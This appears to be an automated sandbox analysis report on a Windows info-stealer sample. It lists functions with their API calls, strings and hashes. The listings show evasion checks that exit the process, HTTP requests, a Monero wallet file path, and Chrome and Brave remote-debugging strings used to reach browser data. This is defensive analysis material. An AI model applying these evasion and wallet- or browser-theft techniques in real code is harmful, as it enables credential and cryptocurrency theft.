                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 7a2dacba466a307afa7f0f1b1cd8d03e13fa3205e7e940a07e1cdf2c3637caa9
                                    • Instruction ID: cc40c6ce47bd417ad46a931f75fa27ef333a6af1773962b9fe95b3045959355f
                                    • Opcode Fuzzy Hash: 7a2dacba466a307afa7f0f1b1cd8d03e13fa3205e7e940a07e1cdf2c3637caa9
                                    • Instruction Fuzzy Hash: 8EF08970648609AFEB32BBA0DC67BBD3374EF04701F148515B51A995D1CBF85900DA91
                                    Function 00364800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364889
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00364899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: e1a4a2dfa31d439a3ba93f8e965fb976afb32de94be86bb20ab72ea5ebf3e553
                                    • Instruction ID: 9827e49f7c473f2783f63fcd1a3ec764abab6a8d988ce13ff1ec6e7cbcf2dd25
                                    • Opcode Fuzzy Hash: e1a4a2dfa31d439a3ba93f8e965fb976afb32de94be86bb20ab72ea5ebf3e553
                                    • Instruction Fuzzy Hash: 3E214FB1D00209ABDF24DFA5EC46ADD7B75FB44320F108625F915AB2D0DB706A09CF91
                                    Function 00375440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 003662D0: InternetOpenA.WININET(00380DFF,00000001,00000000,00000000,00000000), ref: 00366331
                                      • Part of subcall function 003662D0: StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 00366353
                                      • Part of subcall function 003662D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00366385
                                      • Part of subcall function 003662D0: HttpOpenRequestA.WININET(00000000,GET,?,00F3DBF0,00000000,00000000,00400100,00000000), ref: 003663D5
                                      • Part of subcall function 003662D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0036640F
                                      • Part of subcall function 003662D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00366421
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: 91334e347fcd03250d6862be1efd1584e2ab919ab00e3c59bbd2a002b7c5d4d0
                                    • Instruction ID: be4fcc31b554f0766b33fe858636dedba492a157e248b3bfa91d2fd446757052
                                    • Opcode Fuzzy Hash: 91334e347fcd03250d6862be1efd1584e2ab919ab00e3c59bbd2a002b7c5d4d0
                                    • Instruction Fuzzy Hash: 1D111F719105089ACB25FFA4DD62AED73399F90340F50C568E91F5E492EF34AB04CB91
                                    Function 00361220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1493 361220-361247 call 378b40 GlobalMemoryStatusEx 1496 361273-36127a 1493->1496 1497 361249-361271 call 37dd30 * 2 1493->1497 1499 361281-361285 1496->1499 1497->1499 1501 361287 1499->1501 1502 36129a-36129d 1499->1502 1504 361292-361294 ExitProcess 1501->1504 1505 361289-361290 1501->1505 1505->1502 1505->1504
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0036123E
                                    • ExitProcess.KERNEL32 ref: 00361294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: a3a4c96361fd223c1ae94a1d48a5086db8cb78b86792b899489a6b50a17dc996
                                    • Instruction ID: 57aff62b392df3b5e0bce6f0db04712b4391b34d53ddd58e1d30471324b7d266
                                    • Opcode Fuzzy Hash: a3a4c96361fd223c1ae94a1d48a5086db8cb78b86792b899489a6b50a17dc996
                                    • Instruction Fuzzy Hash: E50112F0D54308FAEB21DFE4CC59B9DB778AF14705F14C848E604BA1C4D6B455458759
                                    Function 00377A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377AA0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00377AA7
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00377ABF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: fd5c9d89654aee07412041a1f773ddbdb165c566d704926cc1919371764e5e9b
                                    • Instruction ID: 067e933c508e909693486917c649ea9f603056fbe289fa9b7151784e11394e39
                                    • Opcode Fuzzy Hash: fd5c9d89654aee07412041a1f773ddbdb165c566d704926cc1919371764e5e9b
                                    • Instruction Fuzzy Hash: 220186B1908349EBD725DF98DD45BAFBBBCFB04711F104159F505E2780D7B85A0087A1
                                    Function 00361110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0036112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00361132
                                    • ExitProcess.KERNEL32 ref: 00361143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 7930976e96e9e6656d0dca73ab02be961ff2ecdf7110182383b7923ac5d5e4f2
                                    • Instruction ID: 90f7bdbcf26c443093da5d02cd4be7879babd10dc5e5c58aa83ab91b4cbc1837
                                    • Opcode Fuzzy Hash: 7930976e96e9e6656d0dca73ab02be961ff2ecdf7110182383b7923ac5d5e4f2
                                    • Instruction Fuzzy Hash: 40E0CDB094D30CFBE7215BA0DD0EB0D777C9B04B01F105144F708BA1D0C6F4264096D8
                                    Function 003610A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003610B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003610F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: a4b63f794657b21336dfea3b5cc5e04115bcee17f2f7635d2230e163b94841fa
                                    • Instruction ID: 71025a23a075e17d04baf4e13cef5bbaa0498ed70058e7369538a76bffc81865
                                    • Opcode Fuzzy Hash: a4b63f794657b21336dfea3b5cc5e04115bcee17f2f7635d2230e163b94841fa
                                    • Instruction Fuzzy Hash: 9EF082B1681218BBEB249AA4AC59FAFB798E705B05F305448F944E7280D5719F009AA4
                                    Function 00361190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00377A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377AA0
                                      • Part of subcall function 00377A70: RtlAllocateHeap.NTDLL(00000000), ref: 00377AA7
                                      • Part of subcall function 00377A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00377ABF
                                      • Part of subcall function 003779E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003611B7), ref: 00377A10
                                      • Part of subcall function 003779E0: RtlAllocateHeap.NTDLL(00000000), ref: 00377A17
                                      • Part of subcall function 003779E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00377A2F
                                    • ExitProcess.KERNEL32 ref: 003611C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 5bb2c0be9ed2f5744c13a4e98ed829d96777a0138c6fbab7093756abbeefb987
                                    • Instruction ID: fdbd2ca89fa6023ef590081d858cdc4791ee9967253ef78f0110dc70a3ebfe95
                                    • Opcode Fuzzy Hash: 5bb2c0be9ed2f5744c13a4e98ed829d96777a0138c6fbab7093756abbeefb987
                                    • Instruction Fuzzy Hash: 0AE012E694430153DB3273B4BC0BB1B33CD5B1630EF049418FA0C86102EE6DE81041A5

                                    Non-executed Functions

                                    Function 0036BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00380B32,00380B2F,00000000,?,?,?,00381450,00380B2E), ref: 0036BEC5
                                    • StrCmpCA.SHLWAPI(?,00381454), ref: 0036BF33
                                    • StrCmpCA.SHLWAPI(?,00381458), ref: 0036BF49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036C8A9
                                    • FindClose.KERNEL32(000000FF), ref: 0036C8BB
                                    Strings
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0036C3B2
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0036C495
                                    • Preferences, xrefs: 0036C104
                                    • \Brave\Preferences, xrefs: 0036C1C1
                                    • Google Chrome, xrefs: 0036C6F8
                                    • Brave, xrefs: 0036C0E8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0036C534
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-1869280968
                                    • Opcode ID: 264be8ee4b907889e153a8b20278b3688fb5ea6161dc9d53cd798be2a549e299
                                    • Instruction ID: c9132df0c79e3891fb92c0c5e819a712b9008599a3e18d9e77edfece09401ce9
                                    • Opcode Fuzzy Hash: 264be8ee4b907889e153a8b20278b3688fb5ea6161dc9d53cd798be2a549e299
                                    • Instruction Fuzzy Hash: F85245725105085BCB76FB60DDA6EEE737DAF94300F408598F50EAA091EE345B48CFA2
                                    Function 00373B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00373B1C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00373B33
                                    • lstrcat.KERNEL32(?,?), ref: 00373B85
                                    • StrCmpCA.SHLWAPI(?,00380F58), ref: 00373B97
                                    • StrCmpCA.SHLWAPI(?,00380F5C), ref: 00373BAD
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00373EB7
                                    • FindClose.KERNEL32(000000FF), ref: 00373ECC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
